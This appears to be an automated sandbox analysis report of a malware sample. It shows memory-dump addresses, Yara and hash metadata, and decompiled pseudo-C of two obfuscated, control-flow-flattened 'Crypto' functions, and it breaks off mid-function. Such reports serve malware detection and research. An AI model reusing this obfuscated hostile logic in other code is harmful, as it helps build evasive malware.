                                                      0x00242b8f
                                                      0x00242b97
                                                      0x00242b9f
                                                      0x00242ba7
                                                      0x00242baf
                                                      0x00242bb7
                                                      0x00242bbf
                                                      0x00242bc7
                                                      0x00242bcf
                                                      0x00242bd4
                                                      0x00242bd9
                                                      0x00242be1
                                                      0x00242be9
                                                      0x00242bf1
                                                      0x00242bf9
                                                      0x00242c01
                                                      0x00242c09
                                                      0x00242c0e
                                                      0x00242c16
                                                      0x00242c1e
                                                      0x00242c29
                                                      0x00242c34
                                                      0x00242c3f
                                                      0x00242c4c
                                                      0x00242c4f
                                                      0x00242c53
                                                      0x00242c60
                                                      0x00242c64
                                                      0x00242c6c
                                                      0x00242c77
                                                      0x00242c7f
                                                      0x00242c8a
                                                      0x00242c92
                                                      0x00242c9a
                                                      0x00242ca2
                                                      0x00242caa
                                                      0x00242cb2
                                                      0x00242cba
                                                      0x00242cc6
                                                      0x00242cc9
                                                      0x00242ccd
                                                      0x00242cd5
                                                      0x00242cdd
                                                      0x00242ce5
                                                      0x00242ced
                                                      0x00242cfa
                                                      0x00242cfe
                                                      0x00242d06
                                                      0x00242d10
                                                      0x00242d18
                                                      0x00242d1d
                                                      0x00242d25
                                                      0x00242d2d
                                                      0x00242d3b
                                                      0x00242d40
                                                      0x00242d46
                                                      0x00242d52
                                                      0x00242d55
                                                      0x00242d59
                                                      0x00242d61
                                                      0x00242d6e
                                                      0x00242d72
                                                      0x00242d7a
                                                      0x00242d7f
                                                      0x00242d87
                                                      0x00242d92
                                                      0x00242d9a
                                                      0x00242da5
                                                      0x00242dad
                                                      0x00242db7
                                                      0x00242dbb
                                                      0x00242dc3
                                                      0x00242dcb
                                                      0x00242dd3
                                                      0x00242ddb
                                                      0x00242de3
                                                      0x00242deb
                                                      0x00242df6
                                                      0x00242e01
                                                      0x00242e0c
                                                      0x00242e14
                                                      0x00242e1c
                                                      0x00242e21
                                                      0x00242e29
                                                      0x00242e31
                                                      0x00242e3e
                                                      0x00242e47
                                                      0x00242e4b
                                                      0x00242e53
                                                      0x00242e5b
                                                      0x00242e60
                                                      0x00242e64
                                                      0x00242e6c
                                                      0x00242e74
                                                      0x00242e7c
                                                      0x00242e86
                                                      0x00242e8a
                                                      0x00242e92
                                                      0x00242e9a
                                                      0x00242e9f
                                                      0x00242ea7
                                                      0x00242eaf
                                                      0x00242eb7
                                                      0x00242ec4
                                                      0x00242ec8
                                                      0x00242ed0
                                                      0x00242ed8
                                                      0x00242ee0
                                                      0x00242ee8
                                                      0x00242ef0
                                                      0x00242ef8
                                                      0x00242f00
                                                      0x00242f08
                                                      0x00242f10
                                                      0x00242f18
                                                      0x00242f1f
                                                      0x00242f29
                                                      0x00242f2e
                                                      0x00242f36
                                                      0x00242f3e
                                                      0x00242f48
                                                      0x00242f4c
                                                      0x00242f54
                                                      0x00242f5c
                                                      0x00242f64
                                                      0x00242f6c
                                                      0x00242f7a
                                                      0x00242f7e
                                                      0x00242f82
                                                      0x00242f8a
                                                      0x00242f8a
                                                      0x00242f8c
                                                      0x00000000
                                                      0x00242f8d
                                                      0x00242f9f
                                                      0x002430a3
                                                      0x002430aa
                                                      0x00243193
                                                      0x0024319e
                                                      0x002431a0
                                                      0x00243094
                                                      0x00243094
                                                      0x00242f8a
                                                      0x00242f8a
                                                      0x00242f8c
                                                      0x00000000
                                                      0x00242f8c
                                                      0x00242f8a
                                                      0x002430b0
                                                      0x002430b8
                                                      0x002430e1
                                                      0x002430e1
                                                      0x002430e9
                                                      0x002430eb
                                                      0x002430f8
                                                      0x002430fd
                                                      0x0024312e
                                                      0x0024315f
                                                      0x00243164
                                                      0x00243175
                                                      0x0024317e
                                                      0x0024317e
                                                      0x002430da
                                                      0x002430da
                                                      0x00000000
                                                      0x002430da
                                                      0x002430ba
                                                      0x002430c3
                                                      0x00000000
                                                      0x00000000
                                                      0x002430c5
                                                      0x002430cd
                                                      0x00000000
                                                      0x00000000
                                                      0x002430cf
                                                      0x002430d8
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x002430d8
                                                      0x00242fa7
                                                      0x00243081
                                                      0x0024308c
                                                      0x0024308e
                                                      0x0024308e
                                                      0x00000000
                                                      0x0024308e
                                                      0x00242fb3
                                                      0x0024300c
                                                      0x00243044
                                                      0x0024305d
                                                      0x00243062
                                                      0x00243065
                                                      0x00242f8a
                                                      0x00242f8a
                                                      0x00242f8c
                                                      0x00000000
                                                      0x00242f8c
                                                      0x00242f8a
                                                      0x00242fbb
                                                      0x00243005
                                                      0x00000000
                                                      0x00243005
                                                      0x00242fc3
                                                      0x002431cc
                                                      0x002431cc
                                                      0x002431d2
                                                      0x00000000
                                                      0x00000000
                                                      0x002431e1
                                                      0x002431e1
                                                      0x002431e1
                                                      0x00242feb
                                                      0x00242ff0
                                                      0x00242ff2
                                                      0x00242ff8
                                                      0x00000000
                                                      0x00000000
                                                      0x00242ffe
                                                      0x00000000
                                                      0x00242ffe
                                                      0x002431bc
                                                      0x002431c1
                                                      0x002431c4
                                                      0x002431cb
                                                      0x00000000
                                                      0x002431cb

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: &$9?$A9W$Up$VH$sB$xT$|7$X
                                                      • API String ID: 0-983689062
                                                      • Opcode ID: a04f91dab14ab90d741565bfa905542eef083a9e8bb172c6fecf340adaaa556d
                                                      • Instruction ID: abad22107c5dde3f1454ceb37df59a0331a14e48cd6fca8fa813317af5d102af
                                                      • Opcode Fuzzy Hash: a04f91dab14ab90d741565bfa905542eef083a9e8bb172c6fecf340adaaa556d
                                                      • Instruction Fuzzy Hash: 09F121715183819FD368CF61C549A5FBBF1FBC4308F508A1DF29A862A0D7B98A59CF42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002388E5, Relevance: 11.5, Strings: 9, Instructions: 298COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 99%
                                                      			E002388E5(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _t325;
				short* _t331;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				short _t373;
				void* _t376;
				intOrPtr* _t380;
				void* _t382;

				 *(_t382 + 8) = 0xaa86;
				 *(_t382 + 8) =  *(_t382 + 8) + 0xffffe070;
				 *(_t382 + 8) =  *(_t382 + 8) << 0xc;
				 *(_t382 + 8) =  *(_t382 + 8) << 6;
				 *(_t382 + 8) =  *(_t382 + 8) ^ 0x2bd80002;
				 *(_t382 + 0x64) = 0xdd5d;
				 *(_t382 + 0x64) =  *(_t382 + 0x64) ^ 0x3d690a55;
				 *(_t382 + 0x64) =  *(_t382 + 0x64) ^ 0x3d69d718;
				 *(_t382 + 0x74) = 0x57af;
				_t380 = __edx;
				 *((intOrPtr*)(_t382 + 0x9c)) = __ecx;
				_t373 = 0;
				_t340 = 5;
				 *(_t382 + 0x88) =  *(_t382 + 0x74) / _t340;
				 *(_t382 + 0x88) =  *(_t382 + 0x88) ^ 0x40001189;
				_t376 = 0x1f5a6ea2;
				 *(_t382 + 0x68) = 0xf929;
				 *(_t382 + 0x68) =  *(_t382 + 0x68) ^ 0xb70a9a6f;
				 *(_t382 + 0x68) =  *(_t382 + 0x68) ^ 0xb70a6fd1;
				 *(_t382 + 0x74) = 0x8254;
				 *(_t382 + 0x74) =  *(_t382 + 0x74) << 2;
				 *(_t382 + 0x74) =  *(_t382 + 0x74) ^ 0x00022a5c;
				 *(_t382 + 0x48) = 0x274c;
				_t341 = 0x4c;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) * 0x48;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) ^ 0x4b411b57;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) ^ 0x4b4a2351;
				 *(_t382 + 0x7c) = 0x6684;
				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) + 0xaed9;
				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) ^ 0x00014ccf;
				 *(_t382 + 0x40) = 0x1902;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0x72d0747c;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) / _t341;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0x01828d69;
				 *(_t382 + 0x6c) = 0xb89b;
				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) + 0xffffd32a;
				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) ^ 0x0000fcd5;
				 *(_t382 + 0x14) = 0x3892;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) >> 0xa;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) ^ 0x2d57d543;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) + 0x6cb7;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) ^ 0x2d585a45;
				 *(_t382 + 0x28) = 0xad3d;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) + 0xffffae8b;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) >> 2;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) << 7;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) ^ 0x000b51d9;
				 *(_t382 + 0x58) = 0xde2;
				_t342 = 0x39;
				 *(_t382 + 0x54) =  *(_t382 + 0x58) * 0x34;
				 *(_t382 + 0x54) =  *(_t382 + 0x54) / _t342;
				 *(_t382 + 0x54) =  *(_t382 + 0x54) ^ 0x00000d30;
				 *(_t382 + 0x1c) = 0xba82;
				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) << 4;
				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) >> 0xc;
				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) ^ 0xd59b4b7c;
				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) ^ 0xd59b12fd;
				 *(_t382 + 0x40) = 0xa3d9;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0xd82378ca;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) + 0xffff3c17;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0xd8236a86;
				 *(_t382 + 0x5c) = 0xecab;
				 *(_t382 + 0x5c) =  *(_t382 + 0x5c) >> 0x10;
				 *(_t382 + 0x5c) =  *(_t382 + 0x5c) ^ 0x7d98124e;
				 *(_t382 + 0x5c) =  *(_t382 + 0x5c) ^ 0x7d9832d2;
				 *(_t382 + 0x80) = 0x1387;
				_t343 = 0x2a;
				 *(_t382 + 0x80) =  *(_t382 + 0x80) * 0x63;
				 *(_t382 + 0x80) =  *(_t382 + 0x80) ^ 0x0007c428;
				 *(_t382 + 0x4c) = 0x7ada;
				 *(_t382 + 0x4c) =  *(_t382 + 0x4c) * 0x39;
				 *(_t382 + 0x4c) =  *(_t382 + 0x4c) + 0xffffefa5;
				 *(_t382 + 0x4c) =  *(_t382 + 0x4c) ^ 0x001b3452;
				 *(_t382 + 0x90) = 0x1591;
				 *(_t382 + 0x90) =  *(_t382 + 0x90) >> 8;
				 *(_t382 + 0x90) =  *(_t382 + 0x90) ^ 0x0000431e;
				 *(_t382 + 0x2c) = 0x3f89;
				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) << 5;
				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) | 0xff33b819;
				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) << 7;
				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) ^ 0x9bfcb078;
				 *(_t382 + 0x98) = 0x7441;
				 *(_t382 + 0x98) =  *(_t382 + 0x98) / _t343;
				 *(_t382 + 0x98) =  *(_t382 + 0x98) ^ 0x000035d7;
				 *(_t382 + 0x48) = 0x7f1e;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) + 0x7f31;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) << 0xe;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) ^ 0x3f939bef;
				 *(_t382 + 0x8c) = 0x831c;
				 *(_t382 + 0x8c) =  *(_t382 + 0x8c) << 8;
				 *(_t382 + 0x8c) =  *(_t382 + 0x8c) ^ 0x008363dd;
				 *(_t382 + 0x30) = 0x92b6;
				 *(_t382 + 0x30) =  *(_t382 + 0x30) + 0xa4c2;
				 *(_t382 + 0x30) =  *(_t382 + 0x30) << 0xc;
				 *(_t382 + 0x30) =  *(_t382 + 0x30) << 8;
				 *(_t382 + 0x30) =  *(_t382 + 0x30) ^ 0x77802bdf;
				 *(_t382 + 0x28) = 0x1d89;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) | 0xf9709c7c;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) * 0x25;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) | 0x703957df;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) ^ 0x7d7fbb45;
				 *(_t382 + 0x58) = 0x126d;
				 *(_t382 + 0x58) =  *(_t382 + 0x58) >> 3;
				 *(_t382 + 0x58) =  *(_t382 + 0x58) >> 9;
				 *(_t382 + 0x58) =  *(_t382 + 0x58) ^ 0x000002d5;
				 *(_t382 + 0x7c) = 0x1a69;
				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) | 0x10216cf6;
				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) ^ 0x102141be;
				 *(_t382 + 0x20) = 0xff0b;
				 *(_t382 + 0x20) =  *(_t382 + 0x20) >> 0x10;
				 *(_t382 + 0x20) =  *(_t382 + 0x20) << 7;
				 *(_t382 + 0x20) =  *(_t382 + 0x20) * 0x21;
				 *(_t382 + 0x20) =  *(_t382 + 0x20) ^ 0x000040df;
				 *(_t382 + 0x6c) = 0xe12c;
				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) + 0x79cf;
				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) ^ 0x000152eb;
				 *(_t382 + 0x34) = 0xd574;
				 *(_t382 + 0x34) =  *(_t382 + 0x34) | 0x9559dde1;
				 *(_t382 + 0x34) =  *(_t382 + 0x34) ^ 0x4f646285;
				 *(_t382 + 0x34) =  *(_t382 + 0x34) + 0xffff68ed;
				 *(_t382 + 0x34) =  *(_t382 + 0x34) ^ 0xda3d1e7a;
				 *(_t382 + 0x88) = 0x5832;
				 *(_t382 + 0x88) =  *(_t382 + 0x88) * 0x27;
				 *(_t382 + 0x88) =  *(_t382 + 0x88) ^ 0x000d0611;
				 *(_t382 + 0x50) = 0x55a1;
				 *(_t382 + 0x50) =  *(_t382 + 0x50) << 0xf;
				 *(_t382 + 0x50) =  *(_t382 + 0x50) ^ 0x45d5d069;
				 *(_t382 + 0x50) =  *(_t382 + 0x50) ^ 0x6f0533ce;
				 *(_t382 + 0x14) = 0xc073;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) + 0xffffd37e;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) << 3;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) << 4;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) ^ 0x0049a7c7;
				 *(_t382 + 0x94) = 0xf1be;
				_t337 =  *((intOrPtr*)(_t382 + 0xa0));
				_t344 = 0xa;
				 *(_t382 + 0x94) =  *(_t382 + 0x94) / _t344;
				 *(_t382 + 0x94) =  *(_t382 + 0x94) ^ 0x00002403;
				 *(_t382 + 0x60) = 0x96ef;
				 *(_t382 + 0x60) =  *(_t382 + 0x60) + 0xfa48;
				 *(_t382 + 0x60) =  *(_t382 + 0x60) | 0xbd3809b4;
				 *(_t382 + 0x60) =  *(_t382 + 0x60) ^ 0xbd39967f;
				 *(_t382 + 0x38) = 0xec0c;
				 *(_t382 + 0x38) =  *(_t382 + 0x38) + 0x6908;
				 *(_t382 + 0x38) =  *(_t382 + 0x38) * 0x26;
				 *(_t382 + 0x38) =  *(_t382 + 0x38) >> 9;
				 *(_t382 + 0x38) =  *(_t382 + 0x38) ^ 0x00001f14;
				do {
					while(_t376 != 0x3ac0a14) {
						if(_t376 == 0x7fec1df) {
							_t344 = _t382 + 0x2ac;
							E00240D33(_t382 + 0x2ac,  *(_t382 + 0x48), __eflags,  *((intOrPtr*)(_t382 + 0x70)),  *(_t382 + 0x14),  *((intOrPtr*)(_t382 + 0x24)));
							_t382 = _t382 + 0xc;
							_t376 = 0x12c07630;
							continue;
						} else {
							if(_t376 == 0x12c07630) {
								_push( *(_t382 + 0x1c));
								E002329E3(_t382 + 0x2b0, 0x104, E0024889D( *((intOrPtr*)(_t382 + 0x4b8)),  *(_t382 + 0x58), __eflags),  *(_t382 + 0x5c),  *(_t382 + 0x74),  *(_t382 + 0x94),  *((intOrPtr*)(_t382 + 0xac)),  *((intOrPtr*)(_t382 + 0x4c4)),  *(_t382 + 0x54),  *(_t382 + 0x94));
								_t344 =  *(_t382 + 0x5c);
								E00242025( *(_t382 + 0x5c), _t327,  *((intOrPtr*)(_t382 + 0xc4)),  *((intOrPtr*)(_t382 + 0x70)));
								_t382 = _t382 + 0x30;
								_t376 = 0x3ac0a14;
								continue;
							} else {
								if(_t376 == 0x1f5a6ea2) {
									_t376 = 0x2b635c32;
									continue;
								} else {
									if(_t376 == 0x2b635c32) {
										E00243E3F(_t344, _t382 + 0xa4, __eflags,  *(_t382 + 0x68),  *((intOrPtr*)(_t382 + 0x70)));
										_t331 = E002328CE(_t382 + 0xac,  *(_t382 + 0x50),  *(_t382 + 0x80));
										_t382 = _t382 + 0xc;
										_t376 = 0x7fec1df;
										_t344 = 0;
										 *_t331 = 0;
										continue;
									} else {
										if(_t376 == 0x2c9ad714) {
											E00244F7D( *(_t382 + 0x60),  *(_t382 + 0x38), _t337);
										} else {
											if(_t376 != 0x33ecfade) {
												goto L16;
											} else {
												_t263 = _t380 + 4; // 0xedb0bf04
												E00246CAA( *(_t382 + 0x4c),  *((intOrPtr*)(_t382 + 0xa0)), _t337, _t263,  *(_t382 + 0x64),  *_t380,  *(_t382 + 0x20), _t344,  *_t263,  *(_t382 + 0x94));
												_t382 = _t382 + 0x20;
												_t344 = 1;
												_t376 = 0x2c9ad714;
												_t373 =  !=  ? 1 : _t373;
												continue;
											}
										}
									}
								}
							}
						}
						L19:
						return _t373;
					}
					_t325 = E0023B566(_t344, 0,  *((intOrPtr*)(_t382 + 0xb8)),  *(_t382 + 0x58),  *((intOrPtr*)(_t382 + 0xa8)),  *(_t382 + 0x48), _t344,  *((intOrPtr*)(_t382 + 0x70)),  *(_t382 + 0x90),  *((intOrPtr*)(_t382 + 0x84)),  *(_t382 + 0x2c),  *(_t382 + 0x74),  *(_t382 + 0x1c),  *((intOrPtr*)(_t382 + 0x4b8)));
					_t337 = _t325;
					_t382 = _t382 + 0x30;
					__eflags = _t325 - 0xffffffff;
					if(__eflags == 0) {
						_t376 = 0x18af80d5;
						goto L16;
					} else {
						_t376 = 0x33ecfade;
						continue;
					}
					goto L19;
					L16:
					__eflags = _t376 - 0x18af80d5;
				} while (__eflags != 0);
				goto L19;
			}













                                                      0x002388eb
                                                      0x002388f3
                                                      0x002388fb
                                                      0x00238900
                                                      0x00238905
                                                      0x0023890d
                                                      0x00238915
                                                      0x0023891d
                                                      0x00238925
                                                      0x00238935
                                                      0x00238937
                                                      0x00238942
                                                      0x00238944
                                                      0x00238949
                                                      0x00238952
                                                      0x0023895d
                                                      0x00238962
                                                      0x0023896a
                                                      0x00238972
                                                      0x0023897a
                                                      0x00238982
                                                      0x00238987
                                                      0x0023898f
                                                      0x0023899c
                                                      0x0023899f
                                                      0x002389a3
                                                      0x002389ab
                                                      0x002389b3
                                                      0x002389bb
                                                      0x002389c3
                                                      0x002389cb
                                                      0x002389d3
                                                      0x002389e3
                                                      0x002389e7
                                                      0x002389ef
                                                      0x002389f7
                                                      0x002389ff
                                                      0x00238a07
                                                      0x00238a0f
                                                      0x00238a14
                                                      0x00238a1c
                                                      0x00238a24
                                                      0x00238a2c
                                                      0x00238a34
                                                      0x00238a3c
                                                      0x00238a41
                                                      0x00238a46
                                                      0x00238a4e
                                                      0x00238a5b
                                                      0x00238a5c
                                                      0x00238a66
                                                      0x00238a6a
                                                      0x00238a72
                                                      0x00238a7a
                                                      0x00238a7f
                                                      0x00238a84
                                                      0x00238a8c
                                                      0x00238a94
                                                      0x00238a9c
                                                      0x00238aa4
                                                      0x00238aac
                                                      0x00238ab4
                                                      0x00238abc
                                                      0x00238ac1
                                                      0x00238acb
                                                      0x00238ad3
                                                      0x00238ae8
                                                      0x00238ae9
                                                      0x00238af0
                                                      0x00238afb
                                                      0x00238b08
                                                      0x00238b0c
                                                      0x00238b14
                                                      0x00238b1c
                                                      0x00238b27
                                                      0x00238b2f
                                                      0x00238b3a
                                                      0x00238b42
                                                      0x00238b47
                                                      0x00238b4f
                                                      0x00238b54
                                                      0x00238b5c
                                                      0x00238b70
                                                      0x00238b77
                                                      0x00238b82
                                                      0x00238b8a
                                                      0x00238b92
                                                      0x00238b97
                                                      0x00238b9f
                                                      0x00238baa
                                                      0x00238bb2
                                                      0x00238bbd
                                                      0x00238bc5
                                                      0x00238bcd
                                                      0x00238bd2
                                                      0x00238bd7
                                                      0x00238bdf
                                                      0x00238be7
                                                      0x00238bf4
                                                      0x00238bf8
                                                      0x00238c00
                                                      0x00238c08
                                                      0x00238c10
                                                      0x00238c15
                                                      0x00238c1a
                                                      0x00238c22
                                                      0x00238c2a
                                                      0x00238c32
                                                      0x00238c3a
                                                      0x00238c42
                                                      0x00238c47
                                                      0x00238c51
                                                      0x00238c55
                                                      0x00238c5d
                                                      0x00238c65
                                                      0x00238c6d
                                                      0x00238c75
                                                      0x00238c7d
                                                      0x00238c85
                                                      0x00238c8d
                                                      0x00238c95
                                                      0x00238c9d
                                                      0x00238cb0
                                                      0x00238cb7
                                                      0x00238cc2
                                                      0x00238cca
                                                      0x00238ccf
                                                      0x00238cd7
                                                      0x00238cdf
                                                      0x00238ce7
                                                      0x00238cef
                                                      0x00238cf4
                                                      0x00238cf9
                                                      0x00238d01
                                                      0x00238d17
                                                      0x00238d1e
                                                      0x00238d21
                                                      0x00238d28
                                                      0x00238d33
                                                      0x00238d3b
                                                      0x00238d43
                                                      0x00238d4b
                                                      0x00238d53
                                                      0x00238d5b
                                                      0x00238d68
                                                      0x00238d6c
                                                      0x00238d71
                                                      0x00238d79
                                                      0x00238d79
                                                      0x00238d8b
                                                      0x00238ecd
                                                      0x00238ee0
                                                      0x00238ee5
                                                      0x00238ee8
                                                      0x00000000
                                                      0x00238d91
                                                      0x00238d97
                                                      0x00238e4f
                                                      0x00238ea1
                                                      0x00238eb3
                                                      0x00238eb7
                                                      0x00238ebc
                                                      0x00238ebf
                                                      0x00000000
                                                      0x00238d9d
                                                      0x00238da3
                                                      0x00238e45
                                                      0x00000000
                                                      0x00238da9
                                                      0x00238daf
                                                      0x00238e17
                                                      0x00238e2e
                                                      0x00238e33
                                                      0x00238e36
                                                      0x00238e3b
                                                      0x00238e3d
                                                      0x00000000
                                                      0x00238db1
                                                      0x00238db7
                                                      0x00238f65
                                                      0x00238dbd
                                                      0x00238dc3
                                                      0x00000000
                                                      0x00238dc9
                                                      0x00238dd0
                                                      0x00238dee
                                                      0x00238df5
                                                      0x00238df8
                                                      0x00238df9
                                                      0x00238e00
                                                      0x00000000
                                                      0x00238e00
                                                      0x00238dc3
                                                      0x00238db7
                                                      0x00238daf
                                                      0x00238da3
                                                      0x00238d97
                                                      0x00238f6b
                                                      0x00238f77
                                                      0x00238f77
                                                      0x00238f30
                                                      0x00238f35
                                                      0x00238f37
                                                      0x00238f3a
                                                      0x00238f3d
                                                      0x00238f49
                                                      0x00000000
                                                      0x00238f3f
                                                      0x00238f3f
                                                      0x00000000
                                                      0x00238f3f
                                                      0x00000000
                                                      0x00238f4e
                                                      0x00238f4e
                                                      0x00238f4e
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID: ,$0$2X$2\c+$2\c+$At$EZX-$Q#JK$Ui=
                                                      • API String ID: 2962429428-1096774584
                                                      • Opcode ID: c6f97d9852e594908297d7dc3ae08885571f18f7e498a7c9f787d4f134a9b738
                                                      • Instruction ID: 3597c8509887a9e209f02878ed3091ff690987658e6ee324d715a179228464f9
                                                      • Opcode Fuzzy Hash: c6f97d9852e594908297d7dc3ae08885571f18f7e498a7c9f787d4f134a9b738
                                                      • Instruction Fuzzy Hash: E9F11FB25083809FD368CF65C48A65BFBE1BBC4748F10891DF1DA962A0C7B98959CF43
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002426F5, Relevance: 11.5, Strings: 9, Instructions: 225COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 96%
                                                      			E002426F5(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				void* __edi;
				void* __ebp;
				intOrPtr _t199;
				intOrPtr _t201;
				void* _t202;
				intOrPtr _t204;
				intOrPtr _t208;
				intOrPtr _t209;
				intOrPtr* _t210;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				signed int _t215;
				void* _t216;
				void* _t224;
				void* _t237;
				intOrPtr _t241;
				void* _t242;
				intOrPtr _t246;
				signed int* _t247;

				_t247 =  &_v88;
				_v12 = 0x29be25;
				_v8 = 0x714c58;
				_t241 = 0;
				_t210 = __edx;
				_v4 = 0;
				_v28 = 0x1199;
				_t246 = __ecx;
				_v28 = _v28 + 0xffffe920;
				_t242 = 0x2efb68f6;
				_v28 = _v28 ^ 0xffffad72;
				_v32 = 0x5bb2;
				_t212 = 0x22;
				_v32 = _v32 / _t212;
				_v32 = _v32 ^ 0x00002aec;
				_v56 = 0xeb34;
				_t213 = 0x1b;
				_v56 = _v56 * 0x6a;
				_v56 = _v56 + 0x2965;
				_v56 = _v56 ^ 0x0061feda;
				_v84 = 0xfe4e;
				_v84 = _v84 + 0xd2a6;
				_v84 = _v84 >> 3;
				_v84 = _v84 | 0x3d0bc2c6;
				_v84 = _v84 ^ 0x3d0bc81e;
				_v20 = 0x5db0;
				_v20 = _v20 + 0xffffd438;
				_v20 = _v20 ^ 0x00005602;
				_v24 = 0xa932;
				_v24 = _v24 * 0x1f;
				_v24 = _v24 ^ 0x00145068;
				_v88 = 0xc29f;
				_v88 = _v88 * 0x34;
				_v88 = _v88 ^ 0xcbbf1de0;
				_v88 = _v88 + 0x67bb;
				_v88 = _v88 ^ 0xcb98f8b4;
				_v36 = 0x7c84;
				_v36 = _v36 + 0x6da7;
				_v36 = _v36 ^ 0x0000df84;
				_v60 = 0xf0d8;
				_v60 = _v60 + 0xffffcb07;
				_v60 = _v60 * 0x50;
				_v60 = _v60 ^ 0x003a95e0;
				_v44 = 0x6681;
				_v44 = _v44 + 0xffff19d2;
				_v44 = _v44 / _t213;
				_v44 = _v44 ^ 0x097b3a7d;
				_v16 = 0x94d;
				_v16 = _v16 + 0x4187;
				_v16 = _v16 ^ 0x00007836;
				_v48 = 0x21e9;
				_v48 = _v48 ^ 0x3c92a0ae;
				_v48 = _v48 + 0xf596;
				_v48 = _v48 ^ 0x3c9366ad;
				_v52 = 0x4a04;
				_v52 = _v52 * 0x54;
				_v52 = _v52 ^ 0x56a39f58;
				_v52 = _v52 ^ 0x56bbe121;
				_v80 = 0x166f;
				_v80 = _v80 ^ 0x3bc38db2;
				_v80 = _v80 << 0xd;
				_v80 = _v80 | 0x5d8ccce3;
				_v80 = _v80 ^ 0x7fffd756;
				_v76 = 0xd2e;
				_t214 = 6;
				_v76 = _v76 / _t214;
				_t215 = 0x59;
				_t237 = 0xdd7d922;
				_v76 = _v76 / _t215;
				_v76 = _v76 ^ 0xb1a59fe6;
				_v76 = _v76 ^ 0xb1a5c97b;
				_v40 = 0x2ae1;
				_v40 = _v40 >> 6;
				_v40 = _v40 << 2;
				_v40 = _v40 ^ 0x0000341b;
				_v64 = 0x37cd;
				_v64 = _v64 + 0xffff3540;
				_v64 = _v64 << 1;
				_v64 = _v64 | 0x66261fef;
				_v64 = _v64 ^ 0xfffeb931;
				_v68 = 0x9ed9;
				_v68 = _v68 + 0xad09;
				_v68 = _v68 ^ 0xfd9e5c2b;
				_v68 = _v68 >> 4;
				_v68 = _v68 ^ 0x0fd99075;
				_v72 = 0x1a2d;
				_v72 = _v72 + 0xc4a4;
				_v72 = _v72 << 6;
				_v72 = _v72 * 0x59;
				_v72 = _v72 ^ 0x135ddffd;
				while(1) {
					L1:
					_t216 = 0x2c1c6573;
					while(_t242 != 0x6072d1c) {
						if(_t242 == _t237) {
							_push(_t216);
							_t199 = E00231132(_v44, _t216, _v16, _t216, _t241, _v48, _v52, _v80, E00232A30);
							_t247 =  &(_t247[9]);
							 *((intOrPtr*)(_t241 + 0x1c)) = _t199;
							__eflags = _t199;
							_t216 = 0x2c1c6573;
